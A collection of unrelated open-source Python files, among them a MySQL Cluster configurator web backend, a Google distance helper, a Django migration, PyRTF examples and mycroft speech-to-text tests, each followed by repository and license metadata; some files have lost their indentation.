conn = _get_zerocloud_conn(args)
resp = dict()
if args.container:
job_filename = SYSTEM_MAP_ZAPP_PATH
try:
headers, content = conn.get_object(args.container, job_filename)
except swiftclient.ClientException as exc:
if exc.http_status == 404:
raise zpmlib.ZPMException("Could not find %s" % exc.http_path)
else:
raise zpmlib.ZPMException(str(exc))
job = json.loads(content)
conn.post_job(job, response_dict=resp,
response_body_buffer=response_body_buffer)
LOG.debug('RESP STATUS: %s %s', resp['status'], resp['reason'])
LOG.debug('RESP HEADERS: %s', resp['headers'])
else:
size = os.path.getsize(args.zapp)
zapp_file = open(args.zapp, 'rb')
data_reader = iter(lambda: zapp_file.read(BUFFER_SIZE), b'')
conn.post_zapp(data_reader, response_dict=resp, content_length=size,
response_body_buffer=response_body_buffer)
zapp_file.close()
return resp
def auth(args):
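    """Authenticate against the configured auth service and print the
    resulting auth token and storage URL."""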
conn = _get_zerocloud_conn(args)
conn.authenticate()
print('Auth token: %s' % conn.token)
print('Storage URL: %s' % conn.url)
|
zerovm/zerovm-cli
|
zpmlib/zpm.py
|
Python
|
apache-2.0
| 26,716 | 0 |
#!/usr/bin/env python
###########################################################################
# Copyright (C) 2008-2016 by SukkoPera #
# software@sukkology.net #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the #
# Free Software Foundation, Inc., #
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #
###########################################################################
import os
import subprocess
class ProcessException (Exception):
pass
class Process:
"""Base class for runnable objects."""
def __init__ (self, cmdLine, debug = False):
"""Starts the process and returns a pipe to it."""
self.__cmdLine = cmdLine
self.__debug = debug
if debug:
print "Starting process: %s" % " ".join (self.__cmdLine)
self.process = subprocess.Popen (self.__cmdLine, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE, bufsize = 1, close_fds = True)
if debug:
print "Process started successfully, pid = %d" % self.process.pid
def close (self):
assert (self.process)
self.process.stdin.close ()
self.process.stdout.close ()
ret = self.process.wait ()
if ret != 0:
raise ProcessException ("ERROR: Process returned %d" % ret)
elif self.__debug:
print "Process terminated correctly"
return ret
class DecoderProcess (Process):
def __init__ (self, cmdLine):
Process.__init__ (self, cmdLine)
def read (self, size):
assert (self.process)
return self.process.stdout.read (size)
# def preClose (self):
# self.process.stdin.close ()
class EncoderProcess (Process):
def __init__ (self, cmdLine):
Process.__init__ (self, cmdLine)
def write (self, str):
assert (self.process)
self.process.stdin.write (str)
# def preClose (self):
# self.process.stdout.close ()
|
SukkoPera/audiotrans
|
AudioTrans/Process.py
|
Python
|
gpl-3.0
| 2,826 | 0.023355 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import urllib
import time
import datetime
#From PatMap by Jason Young, available on GitHub at github.com/JasYoung314/PatMap
#Function to get distance between 2 points from google maps. By default route is by car, distance is given in miles and time in minutes.
def CalculateDistance(Origin = False,Destination = False, Method = "driving",TimeUnits = "Minutes",DistUnits = "Miles"):
    #this is the start of a distance matrix url
base = "https://maps.googleapis.com/maps/api/distancematrix/json?"
#Converts the variables to the required format
urlorigin = "origins=%s&".encode('utf-8') %(Origin)
urldestination = "destinations=%s&".encode('utf-8') %(Destination)
urlmethod = "mode=%s&" %(Method)
if DistUnits == "Kilometers" or DistUnits == "Meters":
urlunits = "units=metric&"
else:
urlunits = "units=imperial&"
#constructs the completed url
url = base.decode('utf-8') + urlorigin.decode('utf-8') + urldestination.decode('utf-8') + urlmethod.decode('utf-8') + urlunits.decode('utf-8') + "language=en-EN&sensor=false".decode('utf-8')
    #Interprets the json data received
try:
result= json.load(urllib.urlopen(url))
except:
return 'ERROR','ERROR'
#Reads the status code and takes the appropriate action
if result["status"] == "OK":
if result["rows"][0]["elements"][0]["status"] == "OK":
time = result["rows"][0]["elements"][0]["duration"]["value"]
distance = result["rows"][0]["elements"][0]["distance"]["value"]
if TimeUnits == "Minutes":
time = time/60.0
elif TimeUnits == "Hours":
time = time/3600.0
if DistUnits == "Kilometres":
distance = distance/1000.0
elif DistUnits == "Yards":
distance = distance*1.0936133
elif DistUnits == "Miles":
distance = distance*0.000621371192
return time,distance
else:
return result["rows"][0]["elements"][0]["status"],result["rows"][0]["elements"][0]["status"]
else:
return result["status"]
|
MatthewGWilliams/Staff-Transport
|
emergencyTransport/RouteFinder/GoogleDistances.py
|
Python
|
mit
| 1,984 | 0.043851 |
# -*- coding: utf-8 -*-
from argparse import ArgumentParser
from ansible_playbook_wrapper.command.play import PlayCommand
def main():
parser = ArgumentParser()
sub_parsers = parser.add_subparsers(help='commands')
play_parser = sub_parsers.add_parser('play', help='play playbook')
for arg_info in PlayCommand.ARGUMENT_INFO:
play_parser.add_argument(*(arg_info[0]), **(arg_info[1]))
play_parser.set_defaults(command_class=PlayCommand)
parsed_args = parser.parse_args()
parsed_args.command_class(parsed_args).run()
|
succhiello/ansible-playbook-wrapper
|
ansible_playbook_wrapper/__init__.py
|
Python
|
mit
| 556 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('mainsite', '0005_auto_20150909_0246'),
]
operations = [
migrations.CreateModel(
name='EmailAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),
('name', models.CharField(max_length=100)),
('email_address', models.CharField(max_length=200)),
],
),
migrations.RemoveField(
model_name='email',
name='customer',
),
migrations.RemoveField(
model_name='email',
name='location',
),
migrations.RenameField(
model_name='customer',
old_name='user',
new_name='owner',
),
migrations.RenameField(
model_name='location',
old_name='user',
new_name='owner',
),
migrations.RenameField(
model_name='session',
old_name='user',
new_name='owner',
),
migrations.RenameField(
model_name='sessiontype',
old_name='user',
new_name='owner',
),
migrations.AddField(
model_name='address',
name='owner',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='link',
name='owner',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='phone',
name='owner',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.DeleteModel(
name='Email',
),
migrations.AddField(
model_name='emailaddress',
name='customer',
field=models.ForeignKey(to='mainsite.Customer', null=True, blank=True),
),
migrations.AddField(
model_name='emailaddress',
name='location',
field=models.ForeignKey(to='mainsite.Location', null=True, blank=True),
),
migrations.AddField(
model_name='emailaddress',
name='owner',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
]
|
srenner/photerva
|
mainsite/migrations/0006_auto_20150916_0219.py
|
Python
|
apache-2.0
| 2,722 | 0.001102 |
# Copyright (c) 2012, 2013, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0,
# as published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an additional
# permission to link the program and your derivative works with the
# separately licensed software that they have included with MySQL.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
The core of the configurator backend.
Implements the BaseHTTPRequestHandler that will process HTTP requests
received by the BaseHTTPServer to create the configurator backend web server.
Also contains functions and classes needed to implement the Json-based
communication protocol used to communicate with the frontend.
"""
import traceback
import SocketServer
import BaseHTTPServer
import json
import mimetypes
import pprint
import sys
import types
import ssl
import copy
import socket
import time
import os
import os.path
import logging
import optparse
import webbrowser
import zipfile
import tempfile
import threading
import random
import stat
import errno
import contextlib
import util
import config_parser
import mcc_config
from clusterhost import produce_ABClusterHost
_logger = logging.getLogger(__name__)
class ShutdownException(Exception):
"""Exception thrown when shutdown command arrives"""
pass
class ReplyJsonEncoder(json.JSONEncoder):
"""Specialized encoder for which will serialize the folliowing types,
in addition to those handled by JSONEncoder:
TypeTypes - as an html-friendly version their str() output
TracebackType - as a list of elements (returned by traceback.extrace_tb
Any class with the __dict__ attribute is serialized as a dict to a json object. """
def default(self, obj):
"""Overrides the default function in JSONEncoder. Specialized for TypeTypes,
TracebackTypes and dict-like types. All other types are passed to
JSONEncoder.default()."""
if isinstance(obj, types.TypeType):
            return str(obj).replace('<', '&lt;').replace('>', '&gt;')
if isinstance(obj, types.TracebackType):
return traceback.extract_tb(obj)
if hasattr(obj, '__dict__'):
assert isinstance(vars(obj), dict), str(type(obj)) + ' dict attr has type '+str(type(vars(obj)))
return vars(obj)
# Ordinary json serialization
return json.JSONEncoder.default(self, obj)
def handle_req(req):
"""Primary dispatcher function for messages from the client-frontend. Uses
introspection to look for a function named handle_<command name> and
invokes that to process the message.
req - incoming message (web server request) from the frontend
"""
h = globals()[ 'handle_'+req['head']['cmd']]
return h(req, req['body'])
def make_rep(req, body=None):
"""Utility which creates a reply object based on the headers in the request
object."""
rep = { 'head': { 'seq': req['head']['seq'] +1,
'cmd': req['head']['cmd'],
'rSeq': req['head']['seq'] }}
if body:
rep['body'] = body
return rep
def get_cred(body):
"""Get the credentials from the message in the form of a (user, pwd) tuple.
If there is no ssh object present, or keyBased is present and True, a
(None, None) tuple is returned."""
if not body.has_key('ssh') or util.get_val(body['ssh'], 'keyBased', False):
return (None, None)
return (body['ssh']['user'], body['ssh']['pwd'])
def handle_hostInfoReq(req, body):
"""Handler function for hostInfoReq commands. Will connect to the specified
host through a remote.ClusterHost object to retrieve information.
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
with produce_ABClusterHost(body['hostName'], user, pwd) as ch:
return make_rep(req, { 'host': {'name': ch.host },
'hostRes': {'ram':ch.ram,
'cores': ch.cores,
'uname': ch.hostInfo.uname,
'installdir': ch.installdir,
'datadir': ch.hostInfo.pm.join(ch.homedir, 'MySQL_Cluster') }})
def start_proc(proc, body):
"""Start individual process as specified in startClusterReq command.
proc - the process object in the message
body - the whole message
"""
f = proc['file']
(user, pwd) = get_cred(body)
with produce_ABClusterHost(f['hostName'], user, pwd) as ch:
pc = proc['procCtrl']
params = proc['params']
if f.has_key('autoComplete'):
if isinstance(f['autoComplete'], list):
executable = ch.auto_complete(f['path'], f['autoComplete'], f['name'])
else:
executable = ch.auto_complete(f['path'], ['bin', 'sbin', 'scripts', '', ch.path_module.join('..','scripts')], f['name'])
else:
executable = ch.path_module.join(f['path'], f['name'])
stdinFile = None
if f.has_key('stdinFile'):
assert (ch.file_exists(f['stdinFile'])), 'File ' + f['stdinFile'] + " does not exist on host " + ch.host
stdinFile = f['stdinFile']
_logger.debug('Attempting to launch '+executable+' on '+ch.host+
' with pc='+str(pc))
cmdv = util.params_to_cmdv(executable, params)
if proc.has_key('isCommand'):
return ch.execute_command(cmdv, stdinFile)
return ch.exec_cmdv(cmdv, pc, stdinFile)
def handle_executeCommandReq(req, body):
"""Handler function for execCommandReq messages. Runs the process specified in by the command property."""
if body['command'].has_key('isCommand'):
return make_rep(req, start_proc(body['command'], body))
return make_rep(req, {'out': start_proc(body['command'], body) })
def handle_createFileReq(req, body):
"""Handler function for createFileReq commands. Creates a file on the remote
host with content from the message.
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
f = body['file']
with produce_ABClusterHost(f['hostName'], user, pwd) as ch:
pathname = f['path']
if f.has_key('name'):
pathname = ch.path_module.join(f['path'], f['name'])
assert not (f.has_key('autoComplete') and f['autoComplete'])
assert not (not (f.has_key('overwrite') and f['overwrite']) and ch.file_exists(pathname)), 'File '+pathname+' already exists on host '+ch.host
ch.mkdir_p(f['path'])
with ch.open(pathname, 'w+') as rf:
rf.write(body['contentString'])
with ch.open(pathname) as rf:
assert rf.read() == body['contentString']
else:
ch.mkdir_p(f['path'])
_logger.debug('pathname ' + pathname + ' created')
return make_rep(req)
def handle_appendFileReq(req, body):
"""Handler function for appendFileReq commands. Opens two files on the remote
host, copies from source and appends to destination.
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
assert (body.has_key('sourceFile') and body.has_key('destinationFile'))
sf = body['sourceFile']
df = body['destinationFile']
assert (sf.has_key('path') and sf.has_key('name') and sf.has_key('hostName'))
assert (df.has_key('path') and df.has_key('name') and df.has_key('hostName'))
with produce_ABClusterHost(sf['hostName'], user, pwd) as ch:
sp = ch.path_module.join(sf['path'], sf['name'])
dp = ch.path_module.join(df['path'], df['name'])
assert (ch.file_exists(dp)), 'File ' + dp + ' does not exist on host ' + ch.host
content = None
with ch.open(sp) as sourceFile:
content = sourceFile.read()
assert (ch.file_exists(sp)), 'File ' + sp + ' does not exist on host ' + ch.host
with ch.open(dp, 'a+') as destinationFile:
destinationFile.write(content)
return make_rep(req)
def handle_shutdownServerReq(req, body):
"""x"""
if body.has_key('deathkey') and body['deathkey'] == deathkey:
raise ShutdownException("Shutdown request received")
time.sleep(util.get_val(body, 'sleeptime', 0))
return make_rep(req, 'incorrect death key')
def handle_getLogTailReq(req, body):
"""Handler function for getLogTailReq commands. Opens a file on the remote
host and adds content to reply
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
sf = body['logFile']
assert (sf.has_key('path') and sf.has_key('name') and sf.has_key('hostName'))
with produce_ABClusterHost(sf['hostName'], user, pwd) as ch:
sp = ch.path_module.join(sf['path'], sf['name'])
assert (ch.file_exists(sp)), 'File ' + sp + ' does not exist on host ' + ch.host
with ch.open(sp) as logFile:
return make_rep(req, {'tail': logFile.read()})
from util import _parse_until_delim, parse_properties
def parse_reply(ctx):
"""Return False unless ctx['str'] is an mgmd reply. Assign first line to ctx['reply_type], parse property list and return True otherwise."""
return _parse_until_delim(ctx, 'reply_type', '\n') and parse_properties(ctx,': ')
class mgmd_reply(dict):
def __init__(self, s=None):
if (s):
ctx = {'str': s, 'properties':self}
parse_reply(ctx)
self.reply_type = ctx['reply_type']
def __str__(self):
return self.reply_type+'\n'+'\n'.join(['{0}: {1}'.format(str(k), str(self[k])) for k in self.keys()])+'\n'
def handle_runMgmdCommandReq(req, body):
"""Handler function for runMgmdCommandReq commands. Opens a new connection to mgmd, sends command, parses reply and wraps reply in mcc Rep object."""
hostname = body['hostname'].encode('ascii', 'ignore')
port = body['port']
with util.socket_shutter(socket.create_connection((hostname, port))) as mgmd:
mgmd.sendall(body['mgmd_command']+'\n\n')
s = mgmd.recv(4096)
status = mgmd_reply(s)
sd = {}
for nk in status.keys():
if 'node.' in nk:
(x, n, k) = nk.split('.')
if not sd.has_key(n):
sd[n] = {}
sd[n][k] = status[nk]
return make_rep(req, { 'reply_type': status.reply_type, 'reply_properties':sd})
def handle_getConfigIni(req, body):
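    """Handler function for getConfigIni commands. Reads a cluster config.ini
    on the remote host and returns the parsed configuration."""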
(user, pwd) = get_cred(body)
cf = body['configFile']
assert (cf.has_key('path') and cf.has_key('name') and cf.has_key('hostName'))
    with produce_ABClusterHost(cf['hostName'], user, pwd) as ch:
        sp = ch.path_module.join(cf['path'], cf['name'])
        assert (ch.file_exists(sp)), 'File ' + sp + ' does not exist on host ' + ch.host
with ch.open(sp) as ini:
return make_rep(req, {'config': config_parser.parse_cluster_config_ini_(ini)})
def handle_getNdbConfig(req, body):
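    """Handler function for getNdbConfig commands. Runs ndb_config on the
    remote host and returns its XML output converted to JSON."""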
(user, pwd) = get_cred(body)
with produce_ABClusterHost(body['hostName'], user, pwd) as ch:
ndb_config = ch.path_module.join(body['installpath'], 'ndb_config')
return make_rep(req, { 'ndb_config': json.dumps(util.xml_to_python(ch.exec_cmdv([ndb_config, '--configinfo', '--xml']))) })
def log_thread_name():
"""Utility for dumping thread id in the log."""
cur_thread = threading.current_thread()
_logger.debug("cur_thread="+str(cur_thread.name))
class ConfiguratorHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handler class for web server requests to the configurator backend. To be
used with a BaseHTTPServer.HTTPServer to create a working server."""
def _send_as_json(self, obj):
self.send_response(200)
self.send_header('Content-type', 'text/json')
self.end_headers()
self.server.logger.debug('Will send: %s', json.dumps(obj, indent=2, cls=ReplyJsonEncoder))
json.dump(obj, self.wfile, cls=ReplyJsonEncoder)
def _do_file_req(self, rt):
"""Handles file requests. Attempts to guess
the MIME type and set the Content-Type accordingly."""
try:
log_thread_name()
if self.path == '/':
self.path = '/'+mcc_config.MCC_BROWSER_START_PAGE
self.server.logger.debug(rt+' fdir='+self.server.opts['fdir']+ " path="+os.path.normpath(self.path))
fn = os.path.join(self.server.opts['fdir'], os.path.normpath(self.path[1:]))
try:
os.stat(fn)
except OSError as ose:
self.server.logger.exception(rt + ' '+self.path+ ' failed')
if ose.errno == errno.ENOENT:
self.send_error(404, self.path+'=> file://'+ose.filename+' does not exist')
return
raise
self.send_response(200)
(ct, enc) = mimetypes.guess_type(self.path)
if (ct):
self.send_header('Content-type', ct)
if (enc):
self.send_header('Content-Encoding', enc)
self.end_headers()
if rt == 'GET':
with open(fn, "rb") as f:
self.wfile.write(f.read()+'\r\n\r\n')
except:
self.server.logger.exception(rt + ' '+self.path+ ' failed')
self.send_error(500,'Unexpected exception occured while processing: '+rt+' '+self.path+'\n'+traceback.format_exc()) # Some other number
def do_HEAD(self):
"""Handles HEAD requests by returning the headers without the body if file can be stated."""
self._do_file_req('HEAD')
def do_GET(self):
"""Handles GET requests by returning the specified file."""
self._do_file_req('GET')
def do_POST(self):
"""Handles POST requests, in the form of json-serialized command (request)
objects, from the frontend."""
log_thread_name()
try:
# Assume all post requests are json
assert 'application/json' in self.headers['Content-Type']
msg = json.loads(self.rfile.read(int(self.headers['Content-Length'])))
dbgmsg = copy.deepcopy(msg)
if (dbgmsg['body']['ssh'].has_key('pwd')):
dbgmsg['body']['ssh']['pwd'] = '*' * len(dbgmsg['body']['ssh']['pwd'])
self.server.logger.debug('--> ' + dbgmsg['head']['cmd'] + ':')
self.server.logger.debug(pprint.pformat(dbgmsg))
rep = make_rep(msg)
try:
rep = handle_req(msg)
except ShutdownException:
self.server.shutdown()
except:
#traceback.print_exc()
self.server.logger.exception('POST request failed:')
(etype, eobj, etb) = sys.exc_info()
rep['stat'] = {
'errMsg': util.html_rep(eobj),
'exType': etype,
'exObj': eobj,
'exTrace': etb }
self.server.logger.debug('<-- ' + rep['head']['cmd'] + ':')
self.server.logger.debug(pprint.pformat(rep))
self._send_as_json(rep)
except:
traceback.print_exc()
self.server.logger.critical('Internal server error:')
self.server.logger.exception('Unexpected exception:')
self.send_error(500, 'Server Exception\n'+traceback.format_exc()+'while processeing request:\n'+str(self.headers))
def log_message(self, fmt, *args):
"""Overrides the default implementation which logs to stderr"""
self.server.logger.info(msg=(fmt%args))
class ConfiguratorServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""Specialization of HTTPServer which adds ssl wrapping, shutdown on close and MT (by also inheriting SocketServer.ThreadingMixIn."""
def __init__(self, opts):
# Cannot use super() here, as BaseServer is not a new-style class
SocketServer.TCPServer.__init__(self, (opts['server'], opts['port']), ConfiguratorHandler)
self.opts = opts
self.logger = logging.getLogger(str(self.__class__))
def get_request(self):
"""Override get_request from SocketServer.TCPServer so that we can wrap
the socket in an ssl socket when using ssl."""
sock,addr = SocketServer.TCPServer.get_request(self)
if util.get_val(self.opts, 'ssl', False):
if self.opts['ca_certs']:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
ssl_sock = ssl.wrap_socket(sock, certfile=self.opts['certfile'], keyfile=self.opts['keyfile'],
cert_reqs=cert_reqs, ca_certs=self.opts['ca_certs'], server_side=True)
#self.logger.debug('ssl_sock.getpeercert()='+str(ssl_sock.getpeercert())
return ssl_sock, addr
return sock, addr
def close_request(self, request):
"""Override to make sure shutdown gets called on request socket."""
try:
request.shutdown(socket.SHUT_RDWR)
except:
pass
finally:
SocketServer.TCPServer.close_request(self, request)
configdir = None
basedir = None
deathkey = None
def main(prefix, cfgdir):
"""Server's main-function which parses the command line and starts up the server accordingly.
"""
global configdir
global basedir
configdir = cfgdir
basedir = prefix
frontend = os.path.join(cfgdir, 'frontend')
if not os.path.exists(os.path.join(frontend, 'dojo')):
dojoz = zipfile.ZipFile(os.path.join(frontend, 'dojo.zip'), 'r')
dojoz.extractall(path=frontend)
dojoz.close()
def_server_name = 'localhost'
if hasattr(webbrowser, 'WindowsDefault') and isinstance(webbrowser.get(), webbrowser.WindowsDefault):
        # If on Windows and using IE, use the hostname to avoid an IE9 bug
        # (doesn't affect other versions of IE; there is no easy way to test for it)
def_server_name = socket.gethostname()
cmdln_parser = optparse.OptionParser()
cmdln_parser.add_option('-N', '--server_name', action='store', type='string', default=def_server_name,
help='server name: [default: %default ]')
cmdln_parser.add_option('-p', '--port',
action='store', type='int', dest='port', default=8081,
help='port for the webserver: [default: %default]')
cmdln_parser.add_option('-n', '--no-browser', action='store_true',
help='do not open the server\'s start page in a browser.')
cmdln_parser.add_option('-s', '--browser-start-page', action='store', type='string',
dest='browser_start_page', default=mcc_config.MCC_BROWSER_START_PAGE,
help='start page for browser: [default: %default]')
cmdln_parser.add_option('-d', '--debug-level', action='store', type='string',
default='WARNING',
help='Python logging module debug level (DEBUG, INFO, WARNING, ERROR or CRITICAL). [default: %default]')
cmdln_parser.add_option('-o', '--server-log-file', action='store', type='string',
default=os.path.join(tempfile.gettempdir(),'ndb_setup-'+str(os.getpid())+'.log'),
help='log requests to this file. The value - means log to stderr: [default: %default]')
# option for level/logcfg file
cmdln_parser.add_option('-S', '--use-https', action='store_true', help='use https to secure communication with browser.')
cmdln_parser.add_option('-c', '--cert-file', action='store', type='string', default=os.path.join(cfgdir, 'cfg.pem'), help='file containing X509 certificate which identifies the server (possibly self-signed): [default: %default]')
cmdln_parser.add_option('-k', '--key-file', action='store', type='string', help='file containing private key when if not included in cert-file: [default: %default]')
cmdln_parser.add_option('-a', '--ca-certs-file', action='store', type='string', help='file containing list of client certificates allowed to connect to the server [default: %default (no client authentication)]')
(options, arguments) = cmdln_parser.parse_args()
dbglvl = getattr(logging, options.debug_level, logging.DEBUG)
fmt = '%(asctime)s: %(levelname)s [%(funcName)s;%(filename)s:%(lineno)d]: %(message)s '
if options.server_log_file == '-':
logging.basicConfig(level=dbglvl, format=fmt)
else:
logging.basicConfig(level=dbglvl, format=fmt, filename=options.server_log_file)
srvopts = { 'server' : options.server_name,
'port': options.port,
'cdir': cfgdir,
'fdir': os.path.join(cfgdir, 'frontend') }
if options.use_https:
srvopts['ssl'] = True
srvopts['certfile'] = options.cert_file
srvopts['keyfile'] = options.key_file
srvopts['ca_certs'] = options.ca_certs_file
print 'Starting web server on port ' + repr(options.port)
url_host = options.server_name
if url_host == '':
url_host = 'localhost'
if options.use_https:
url = 'https://{0}:{opt.port}/{opt.browser_start_page}'.format(url_host, opt=options)
else:
url = 'http://{0}:{opt.port}/{opt.browser_start_page}'.format(url_host, opt=options)
httpsrv = None
global deathkey
deathkey = random.randint(100000, 1000000)
print 'deathkey='+str(deathkey)
# dkf = open('deathkey.txt','w')
# dkf.write(str(deathkey))
# dkf.close()
# os.chmod('deathkey.txt', stat.S_IRUSR)
try:
httpsrv = ConfiguratorServer(srvopts)
if not options.no_browser:
try:
webbrowser.open_new(url)
except:
logging.exception('Failed to control browser: ')
print 'Could not control your browser. Try to opening '+url+' to launch the application.'
else:
print 'The application should now be running in your browser.\n(Alternatively you can navigate to '+url+' to start it)'
else:
print 'Navigate to '+url+' to launch the application.'
httpsrv.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down web server'
except:
traceback.print_exc()
finally:
if httpsrv:
httpsrv.socket.close()
#os.remove('deathkey.txt')
|
greenlion/mysql-server
|
storage/ndb/mcc/request_handler.py
|
Python
|
gpl-2.0
| 23,716 | 0.009529 |
import os
import sys
sys.path.append( '../' )
from PyRTF import *
def MakeExample1() :
doc = Document()
ss = doc.StyleSheet
section = Section()
doc.Sections.append( section )
# text can be added directly to the section
# a paragraph object is create as needed
section.append( 'Image Example 1' )
section.append( 'You can add images in one of two ways, either converting the '
'image each and every time like;' )
image = Image( 'image.jpg' )
section.append( Paragraph( image ) )
section.append( 'Or you can use the image object to convert the image and then '
'save it to a raw code element that can be included later.' )
fout = file( 'image_tmp.py', 'w' )
print >> fout, 'from PyRTF import RawCode'
print >> fout
fout.write( image.ToRawCode( 'TEST_IMAGE' ) )
fout.close()
import image_tmp
section.append( Paragraph( image_tmp.TEST_IMAGE ) )
section.append( 'Have a look in image_tmp.py for the converted RawCode.' )
section.append( 'here are some png files' )
for f in [ 'img1.png',
'img2.png',
'img3.png',
'img4.png' ] :
section.append( Paragraph( Image( f ) ) )
return doc
def OpenFile( name ) :
return file( '%s.rtf' % name, 'w' )
if __name__ == '__main__' :
DR = Renderer()
doc1 = MakeExample1()
DR.Write( doc1, OpenFile( 'Image1' ) )
print "Finished"
|
lambdamusic/testproject
|
konproj/libs/PyRTF/examples/examples2.py
|
Python
|
gpl-2.0
| 1,338 | 0.076233 |
blah = 33
|
sjdv1982/seamless
|
seamless/graphs/multi_module/mytestpackage/mod4.py
|
Python
|
mit
| 10 | 0 |
import mock
import unittest
import mycroft.stt
from mycroft.configuration import ConfigurationManager
class TestSTT(unittest.TestCase):
@mock.patch.object(ConfigurationManager, 'get')
def test_factory(self, mock_get):
mycroft.stt.STTApi = mock.MagicMock()
config = {'stt': {
'module': 'mycroft',
'wit': {'credential': {'token': 'FOOBAR'}},
'google': {'credential': {'token': 'FOOBAR'}},
'ibm': {'credential': {'token': 'FOOBAR'}},
'kaldi': {'uri': 'https://test.com'},
'mycroft': {'uri': 'https://test.com'}
},
'lang': 'en-US'
}
mock_get.return_value = config
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.MycroftSTT)
config['stt']['module'] = 'google'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.GoogleSTT)
config['stt']['module'] = 'ibm'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.IBMSTT)
config['stt']['module'] = 'kaldi'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.KaldiSTT)
config['stt']['module'] = 'wit'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.WITSTT)
@mock.patch.object(ConfigurationManager, 'get')
def test_stt(self, mock_get):
mycroft.stt.STTApi = mock.MagicMock()
config = {'stt': {
'module': 'mycroft',
'mycroft': {'uri': 'https://test.com'}
},
'lang': 'en-US'
}
mock_get.return_value = config
class TestSTT(mycroft.stt.STT):
def execute(self, audio, language=None):
pass
stt = TestSTT()
self.assertEqual(stt.lang, 'en-US')
config['lang'] = 'en-us'
# Check that second part of lang gets capitalized
stt = TestSTT()
self.assertEqual(stt.lang, 'en-US')
# Check that it works with two letters
config['lang'] = 'sv'
stt = TestSTT()
self.assertEqual(stt.lang, 'sv')
@mock.patch.object(ConfigurationManager, 'get')
def test_mycroft_stt(self, mock_get):
mycroft.stt.STTApi = mock.MagicMock()
config = {'stt': {
'module': 'mycroft',
'mycroft': {'uri': 'https://test.com'}
},
'lang': 'en-US'
}
mock_get.return_value = config
stt = mycroft.stt.MycroftSTT()
audio = mock.MagicMock()
stt.execute(audio, 'en-us')
self.assertTrue(mycroft.stt.STTApi.called)
@mock.patch.object(ConfigurationManager, 'get')
def test_google_stt(self, mock_get):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'google',
'google': {'credential': {'token': 'FOOBAR'}},
},
"lang": "en-US"
}
mock_get.return_value = config
audio = mock.MagicMock()
stt = mycroft.stt.GoogleSTT()
stt.execute(audio)
self.assertTrue(stt.recognizer.recognize_google.called)
@mock.patch.object(ConfigurationManager, 'get')
def test_ibm_stt(self, mock_get):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'ibm',
'ibm': {'credential': {'token': 'FOOBAR'}},
},
"lang": "en-US"
}
mock_get.return_value = config
audio = mock.MagicMock()
stt = mycroft.stt.IBMSTT()
stt.execute(audio)
self.assertTrue(stt.recognizer.recognize_ibm.called)
@mock.patch.object(ConfigurationManager, 'get')
def test_wit_stt(self, mock_get):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'wit',
'wit': {'credential': {'token': 'FOOBAR'}},
},
"lang": "en-US"
}
mock_get.return_value = config
audio = mock.MagicMock()
stt = mycroft.stt.WITSTT()
stt.execute(audio)
self.assertTrue(stt.recognizer.recognize_wit.called)
@mock.patch('mycroft.stt.post')
@mock.patch.object(ConfigurationManager, 'get')
def test_kaldi_stt(self, mock_get, mock_post):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'kaldi',
'kaldi': {'uri': 'https://test.com'},
},
"lang": "en-US"
}
mock_get.return_value = config
kaldiResponse = mock.MagicMock()
kaldiResponse.json.return_value = {
'hypotheses': [{'utterance': ' [noise] text'},
{'utterance': ' asdf'}]
}
mock_post.return_value = kaldiResponse
audio = mock.MagicMock()
stt = mycroft.stt.KaldiSTT()
self.assertEquals(stt.execute(audio), 'text')
|
epaglier/Project-JARVIS
|
